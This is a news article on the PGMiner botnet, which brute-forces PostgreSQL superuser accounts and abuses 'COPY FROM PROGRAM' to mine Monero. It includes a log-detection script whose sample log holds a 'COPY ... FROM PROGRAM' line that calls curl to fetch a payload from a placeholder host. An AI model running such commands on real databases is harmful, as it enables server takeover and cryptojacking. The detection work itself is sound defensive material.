A new Linux-based botnet that mines cryptocurrency has been discovered. The botnet is reported to exploit a remote code execution vulnerability in the PostgreSQL database, and in many respects it behaves unlike existing botnets. It was discovered and announced by the security company Palo Alto Networks.
PostgreSQL, also known as Postgres, is a popular open source relational database management system that is widely used in production environments. The remote code execution vulnerability involved is CVE-2019-9193, and the botnet has been named PGMiner. It is said to be the first botnet discovered that targets PostgreSQL databases.
Palo Alto writes: “PostgreSQL’s ‘copy from program’ feature is currently being exploited. This feature was first introduced in September 2013 in version 9.3.”
This vulnerability was first identified in 2018 and was even assigned a CVE number, but the PostgreSQL community subsequently argued that it was not a vulnerability, and it currently has “disputed” status. The discovery of the botnet, however, shows that whether it is disputed, or what exactly it is called, makes no difference: it can be exploited by attackers either way.
Palo Alto explains that the feature in question, which “allows a local or remote superuser to run shell scripts directly on the server,” is what makes it attractive to attackers. A remote code execution attack cannot succeed, however, unless a remote or untrusted user holds superuser privileges, and it is said that access management and authentication controls can defend against it.
In other words, remote code execution becomes possible when the authentication-related settings are not configured properly. In the PGMiner attacks, the superuser account was found to have been compromised by brute force.
First, the botnet malware uses a client library to locate target database servers, then runs a brute force attack against them. Palo Alto explained that the attackers used a list of easy passwords such as 112233 or 1q2w3e4r. A brute force attack consists of submitting candidate passwords until one succeeds.
Once it has superuser access, the botnet malware uses curl to carry out several functions. Curl is a command line tool that can send data to or receive data from a server.
If curl is not present on the victim’s system, various techniques are used to download the curl binary and move it into the execution path. It may download and install the official package directly, or download a static curl build from GitHub. “It is sometimes downloaded using /dev/tcp, which is very uncommon among the many attack strategies found to date.”
The malware then connects the victim to the C&C server, using a SOCKS5 proxy. System information is collected and sent to the C&C, and based on it the attackers identify the victim, select the appropriate cryptocurrency mining payload, and send it. PGMiner walks a list of folders looking for one in which it can create a new file, and changes the attributes of the first such folder it finds. This ensures that the malicious payload runs on the victim’s machine.
Attackers that have got this far delete cloud security tools such as Aegis and Yunjing. Next the malware checks for virtual machines and kills other CPU-intensive processes; if another mining process is already running, it is terminated too. After clearing the field, it uses the CPU to mine Monero. Certain modules are also downloaded repeatedly.
It is hard to know exactly how much profit the attackers have made from PGMiner so far, because there is not much activity. PostgreSQL users should remove the pg_execute_server_program privilege from untrusted users to protect the database from attacks of this kind; this alone makes the attack described above impossible. It is also worth checking whether a process called tracepath is running and terminating it.
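The two observable steps of the chain described above, the password brute force against the superuser and the later use of `COPY ... FROM PROGRAM`, both leave traces in the PostgreSQL server log. The following detection script is an added example, not code from the article or from Palo Alto; it assumes the log_line_prefix `'%m [%p] %q%u@%d '` with log_connections and log_statement = 'all' enabled, and the sample log lines are constructed.

```python
import re
from collections import Counter

# Constructed sample lines (not from the article), in the shape PostgreSQL writes with
# log_line_prefix = '%m [%p] %q%u@%d ', log_connections = on and log_statement = 'all'.
SAMPLE_LOG = """\
2020-12-10 10:15:01.001 UTC [4101] LOG:  connection received: host=203.0.113.7 port=51022
2020-12-10 10:15:01.002 UTC [4101] postgres@postgres FATAL:  password authentication failed for user "postgres"
2020-12-10 10:15:01.201 UTC [4102] LOG:  connection received: host=203.0.113.7 port=51023
2020-12-10 10:15:01.202 UTC [4102] postgres@postgres FATAL:  password authentication failed for user "postgres"
2020-12-10 10:15:01.401 UTC [4103] LOG:  connection received: host=203.0.113.7 port=51024
2020-12-10 10:15:01.402 UTC [4103] postgres@postgres FATAL:  password authentication failed for user "postgres"
2020-12-10 10:15:03.010 UTC [4107] LOG:  connection received: host=203.0.113.7 port=51030
2020-12-10 10:15:03.011 UTC [4107] postgres@postgres LOG:  connection authorized: user=postgres database=postgres
2020-12-10 10:15:03.500 UTC [4107] postgres@postgres LOG:  statement: COPY scratch FROM PROGRAM 'curl http://example.invalid/payload'
2020-12-10 10:16:00.000 UTC [4200] LOG:  connection received: host=192.0.2.10 port=40001
2020-12-10 10:16:00.100 UTC [4200] app@appdb LOG:  statement: SELECT count(*) FROM orders
"""

LINE_RE = re.compile(r"^\S+ \S+ \S+ \[(?P<pid>\d+)\] (?:(?P<user>\w+)@\w+ )?[A-Z]+:\s+(?P<msg>.*)$")
CONN_RE = re.compile(r"connection received: host=(?P<host>\S+)")
AUTH_FAIL_RE = re.compile(r'authentication failed for user "')
PROGRAM_RE = re.compile(r"\bCOPY\b.*\b(?:FROM|TO)\s+PROGRAM\b", re.IGNORECASE)

def analyze(log_text, fail_threshold=3):
    """Flag hosts with >= fail_threshold failed logins and every COPY ... PROGRAM statement.
    The backend pid links each session's lines to its 'connection received' line, which carries the host."""
    host_by_pid = {}
    failures = Counter()
    program_copies = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        pid, msg = m["pid"], m["msg"]
        conn = CONN_RE.search(msg)
        if conn:
            host_by_pid[pid] = conn["host"]
            continue
        host = host_by_pid.get(pid, "unknown")
        if AUTH_FAIL_RE.search(msg):
            failures[host] += 1
        elif PROGRAM_RE.search(msg):
            # Server-side program execution needs superuser or pg_execute_server_program, so it is rare
            program_copies.append({"host": host, "user": m["user"], "statement": msg.split("statement: ", 1)[-1]})
    brute_force = {h: n for h, n in failures.items() if n >= fail_threshold}
    return {"brute_force": brute_force, "program_copies": program_copies}

if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

On the constructed sample the same client host is flagged for both the login burst and the program copy, which is the sequence the article attributes to PGMiner.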
Palo Alto argues: “Attackers were able to mine cryptocurrency quietly thanks to the fact that the security bug exploited this time was not clearly labeled a vulnerability but was in dispute. Arguing over whether or not something is a vulnerability does nothing to stop attackers.”
The following are the new and rare attack techniques identified in PGMiner:
1) Inserting the victim’s ID into the application
2) Impersonating the name of a trusted process
3) Downloading the curl binary via multiple paths
4) Aggressively terminating other mining programs
5) Repeatedly downloading specific modules and cryptocurrency mining malware
6) Continuously changing the C&C address
Palo Alto concluded that “PGMiner is still evolving,” and warned that there is a high possibility of the malware running not only on Linux but also on Windows and macOS.